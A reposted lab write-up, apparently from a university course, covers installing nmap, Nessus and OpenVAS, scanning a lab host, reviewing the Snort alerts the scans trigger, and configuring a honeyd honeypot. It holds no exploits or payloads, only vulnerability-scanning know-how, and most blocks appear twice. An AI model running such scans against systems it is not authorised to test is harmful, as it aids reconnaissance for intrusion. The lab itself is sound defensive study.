Penetration Testing : Applications

最新推荐文章于 2024-04-24 14:24:05 发布

cnbird2008

最新推荐文章于 2024-04-24 14:24:05 发布

阅读量3.2k

点赞数

文章标签： testing classification tcp windows microsoft leak

http://www.dis9.com/penetration-testing-applications.html

Installing:

1	sudo apt-get install nmap nessus openvas-server openvas-client

sudo apt-get install nmap nessus openvas-server openvas-client

We could not scan a thing if we were trying to nmap from the Xen server. So we configured a default gw on the VM:

1	route add default gw 145.100.105.193

route add default gw 145.100.105.193

At this moment our system was unprotected to the outside, so we added some rules to the iptables firewall:

1
2
3

iptables -A INPUT -s 145.100.105.193 -j ACCEPT
iptables -A INPUT -s 145.100.102.131 -j ACCEPT
iptables -I INPUT 3 -j DROP

iptables -A INPUT -s 145.100.105.193 -j ACCEPT
iptables -A INPUT -s 145.100.102.131 -j ACCEPT
iptables -I INPUT 3 -j DROP

On our workstation it was now possible to scan for open ports:

sudo nmap 145.100.105.196 
 
Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CEST
Interesting ports on 145.100.105.196:
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
631/tcp open  ipp
 
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

sudo nmap 145.100.105.196 

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CEST
Interesting ports on 145.100.105.196:
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
631/tcp open  ipp

Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

In the snort log (/var/log/snort/alert) we saw the following entries:

[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
Type:8  Code:0  ID:12876   Seq:0  ECHO
[Xref => http://www.whitehats.com/info/IDS162]
 
[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF
 
[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0x1000  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
 
[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705
TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
Type:8  Code:0  ID:12876   Seq:0  ECHO
[Xref => http://www.whitehats.com/info/IDS162]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0x1000  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705
TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

So snort detected the Nmap portscan.

After installing nessus via aptitude we had to add a nessus user:

/opt/nessus/sbin/nessus-adduser
Login : jeroen
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that jeroen has the right to test. For instance, you may want
him to be able to scan his own host only.
 
Please see the nessus-adduser manual for the rules syntax
 
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
 
Login             : jeroen
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] y
User added

/opt/nessus/sbin/nessus-adduser
Login : jeroen
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that jeroen has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login             : jeroen
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] y
User added

The following step is to start nessus:

/etc/init.d/nessusd start
 
Missing plugins. Attempting a plugin update...
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/

/etc/init.d/nessusd start

Missing plugins. Attempting a plugin update...
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/

We registered on the website that was given and a mail with the activation key was sent to us. We registered using the following command:

/opt/nessus/bin/nessus-fetch --register ****-****-****-****-****
 
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

/opt/nessus/bin/nessus-fetch --register ****-****-****-****-****

Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

After this process I tried to start nessus again:

1	/etc/init.d/nessusd start

/etc/init.d/nessusd start

No errors were given, so we could start the scan:

/opt/nessus/bin/nessuscmd 145.100.105.196
 
Starting nessuscmd 4.2.1
Scanning '145.100.105.196'...
 
+ Results found on 145.100.105.196 :
   - Port ssh (22/tcp) is open
   - Port sunrpc (111/tcp) is open
   - Port ipp (631/tcp) is open
   - Port postgresql (5432/tcp) is open

/opt/nessus/bin/nessuscmd 145.100.105.196

Starting nessuscmd 4.2.1
Scanning '145.100.105.196'...

+ Results found on 145.100.105.196 :
   - Port ssh (22/tcp) is open
   - Port sunrpc (111/tcp) is open
   - Port ipp (631/tcp) is open
   - Port postgresql (5432/tcp) is open

We got the following records in the snort log:

[**] [122:17:0] (portscan) UDP Portscan [**]
[Priority: 3]
04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21
PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166
 
[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF
 
[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF
 
[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161
TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7AEF1E8D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
 
[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F2B8C6A  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/fcgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
 
[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F3E7E72  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
 
[**] [1:249:8] DDOS mstream client to handler [**]
[Classification: Attempted Denial of Service] [Priority: 2]
04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104
TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF
******S* Seq: 0x82C26C79  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111]
 
[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF
 
[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF
******S* Seq: 0x88EF7B46  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
 
[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8907EDAA  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [122:17:0] (portscan) UDP Portscan [**]
[Priority: 3]
04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21
PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166

[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161
TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7AEF1E8D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F2B8C6A  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/fcgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F3E7E72  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:249:8] DDOS mstream client to handler [**]
[Classification: Attempted Denial of Service] [Priority: 2]
04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104
TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF
******S* Seq: 0x82C26C79  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF
******S* Seq: 0x88EF7B46  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8907EDAA  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

Installing OpenVAS was a bit more complicated. Installing from the repository was not possible because of an error in the package. We installed it from source. We took the newest version and tried to install it:

1 2	wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz ./configure

wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz
./configure

This resulted in an error. It had a few dependencies and needed the openVAS libraries, so I downloaded these:

1
2
3

wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz
./configure
configure: error: "glib >= 2.12.0 not found"

wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz
./configure
configure: error: "glib >= 2.12.0 not found"

Another dependency… I searched for packages in the repository that included glib:

1	apt-file search glib

apt-file search glib

The packages that included glib were max. version 2.7, so we decided to install a slightly older version. We had a lot of help from this website: http://wikisecure.net/security/how-to-install-openvas-ubuntu9 First we made some preparations:

sudo apt-get update
sudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscan
sudo updatedb
sudo ldconfig
cd /home/user/Desktop
mkdir OpenVAS
cd OpenVAS

sudo apt-get update
sudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscan
sudo updatedb
sudo ldconfig
cd /home/user/Desktop
mkdir OpenVAS
cd OpenVAS

After this we downloaded the openVAS libraries, scanner and client and extracted them:

wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gz
sudo tar -zxvf openvas-libraries-3.0.0.tar.gz
sudo tar -zxvf openvas-scanner-3.0.0.tar.gz
sudo tar -zxvf openvas-client-3.0.0.tar.gz

wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gz
sudo tar -zxvf openvas-libraries-3.0.0.tar.gz
sudo tar -zxvf openvas-scanner-3.0.0.tar.gz
sudo tar -zxvf openvas-client-3.0.0.tar.gz

Installing OpenVAS Libraries:

cd openvas-libraries-3.0.0
sudo ./configure
sudo apt-get install cmake
sudo make
sudo make install
sudo ldconfig

cd openvas-libraries-3.0.0
sudo ./configure
sudo apt-get install cmake
sudo make
sudo make install
sudo ldconfig

Installing OpenVAS Scanner daemons:

cd ../scanner-3.0.0
sudo ./configure
sudo make
sudo make install

cd ../scanner-3.0.0
sudo ./configure
sudo make
sudo make install

Installing OpenVAS Client GUI:

cd ../openvas-client-3.0.0
sudo ./configure
sudo make
sudo make install
sudo updatedb
sudo ldconfig

cd ../openvas-client-3.0.0
sudo ./configure
sudo make
sudo make install
sudo updatedb
sudo ldconfig

Next, we generated a certificate:

sudo openvas-mkcert
-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------
 
This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.
 
CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [US]: NL
Your state or province name [none]: Noord-Holland
Your location (e.g. town) [Berlin]: Amsterdam
Your organization [OpenVAS Users United]: 
 
-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------
 
Congratulations. Your server certificate was properly created.
 
/usr/local/etc/openvas/openvassd.conf updated
The following files were created:
 
. Certification authority:
   Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
   Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem
 
. OpenVAS Server :
    Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
    Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem
 
Press [ENTER] to exit

sudo openvas-mkcert
-------------------------------------------------------------------------------
			Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [US]: NL
Your state or province name [none]: Noord-Holland
Your location (e.g. town) [Berlin]: Amsterdam
Your organization [OpenVAS Users United]: 

-------------------------------------------------------------------------------
			Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

/usr/local/etc/openvas/openvassd.conf updated
The following files were created:

. Certification authority:
   Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
   Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
    Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
    Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Eventually we added an openVAS use:

sudo openvas-adduser
Create user account for OpenVAS Client. [It will be used to login to OpenVAS Client]
 
Using /var/tmp as a temporary file holder.
 
Add a new openvassd user
---------------------------------
 
Login : jeroen
Authentication (pass/cert) [pass] :
Login password :
Login password (again) : 
 
User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.
 
Please see the openvas-adduser(8) man page for the rules syntax.
 
Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)
 
User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.
 
Please see the openvas-adduser(8) man page for the rules syntax.
 
Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)
 
Login             : jeroen
Password          : ***********
 
Rules             : 
 
Is that ok? (y/n) [y] 
 
user added.

sudo openvas-adduser
Create user account for OpenVAS Client. [It will be used to login to OpenVAS Client]

Using /var/tmp as a temporary file holder.

Add a new openvassd user
---------------------------------

Login : jeroen
Authentication (pass/cert) [pass] :
Login password :
Login password (again) : 

User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)

User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)

Login             : jeroen
Password          : ***********

Rules             : 

Is that ok? (y/n) [y] 

user added.

Updating the Openvas Plugins folder (/usr/local/lib/openvas/plugins) with the latest set of plugins.

1	sudo openvas-nvt-sync

sudo openvas-nvt-sync

Start openVAS:

1	sudo openvassd

sudo openvassd

After this you have to enter the IP address or a list of IP addresses of the host(s) you want to scan in a text file:

1	echo "145.100.105.196" >> iptoscan.txt

echo "145.100.105.196" >> iptoscan.txt

To scan the ip addresses we executed the following command:

OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T html
Please choose your level of SSL paranoia (Hint: if you want to manage
many servers from your client, choose 2. Otherwise, choose 1. Or 3,
if you are paranoid.
2
*** Warning: paranoia_level=2 but "trusted_ca" file not found:
cacert.pem
*** Info: Found and enabled 16709 new plugins.

OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T html
Please choose your level of SSL paranoia (Hint: if you want to manage
many servers from your client, choose 2. Otherwise, choose 1. Or 3,
if you are paranoid.
2
*** Warning: paranoia_level=2 but "trusted_ca" file not found:
cacert.pem
*** Info: Found and enabled 16709 new plugins.

The output of the scan will be saved in scanresults.html:

Honey pots:
- Setup a honey pot of choice (e.g. honeyd) in a VM (new or existing VM, your choice).
  - Configure it to act like a vulnerable system.
  - Run at least three services.

We used the following configuration file to create a VM for the honeypot:

import os, re
arch = os.uname()[4]
if re.search('64', arch):
    arch_libdir = 'lib64'
else:
    arch_libdir = 'lib'
 
kernel = "/usr/lib/xen/boot/hvmloader"
builder='hvm'
 
memory = 256
name = "ubuntu-desktop"
builde='hvm'
dhcp = "dhcp"
vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]
disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]
#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]
device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'
stdvga=0
sdl=0
vnc=1
vncviewer=1
boot = 'cd'
serial='pty'

import os, re
arch = os.uname()[4]
if re.search('64', arch):
    arch_libdir = 'lib64'
else:
    arch_libdir = 'lib'

kernel = "/usr/lib/xen/boot/hvmloader"
builder='hvm'

memory = 256
name = "ubuntu-desktop"
builde='hvm'
dhcp = "dhcp"
vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]
disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]
#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]
device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'
stdvga=0
sdl=0
vnc=1
vncviewer=1
boot = 'cd'
serial='pty'

We created an image of 3GB:

1	dd if=/dev/zero of=disk1.img count=0 seek=3G

dd if=/dev/zero of=disk1.img count=0 seek=3G

And made created the VM:

1	xm create xenhoney.cfg

xm create xenhoney.cfg

Then we installed honeyd:

1	sudo apt-get install honeyd

sudo apt-get install honeyd

First of all, the honeyd should reply on arp requests which are destined for the virtual servers that honeyd created. We will use farpd for this, which is already installed by default on Ubuntu. Here for we modified /etc/default/farpd:

1 2	INTERFACE="eth0" NETWORK="145.100.105.192/27"

INTERFACE="eth0"
NETWORK="145.100.105.192/27"

This means that farpd will listen to interface eth0 for incoming arp requests and handle the arp request of the network 145.100.105.192/27. After this step the daemon needs to be restarted:

/etc/init.d/farpd restart
* Restarting Fake-arpd daemon farpd
arpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d
                                                                         [ OK ]

/etc/init.d/farpd restart
* Restarting Fake-arpd daemon farpd
arpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d
                                                                         [ OK ]

Next, we had to modify the honeyd config file:

1
2
3

RUN="yes"
INTERFACE="eth0"
NETWORK=145.100.105.196

RUN="yes"
INTERFACE="eth0"
NETWORK=145.100.105.196

Eventually we can start the daemon:

1 2	/etc/init.d/honeyd start * Starting Honeyd daemon honeyd [ OK ]

/etc/init.d/honeyd start
 * Starting Honeyd daemon honeyd                                         [ OK ]

Next thing to do is to create a fake system:

vim /etc/honeypot/myfakemachine.conf
 
create windows
set windows personality "Microsoft Windows XP Professional"
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"
add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"
add windows tcp port 139 open
add windows tcp port 137 open
add windows udp port 137 open
add windows udp port 135 open
set windows default tcp action reset
set windows default udp action reset
bind 145.100.105.197 windows

vim /etc/honeypot/myfakemachine.conf

create windows
set windows personality "Microsoft Windows XP Professional"
add windows tcp port 80 "sh scripts/web.sh"
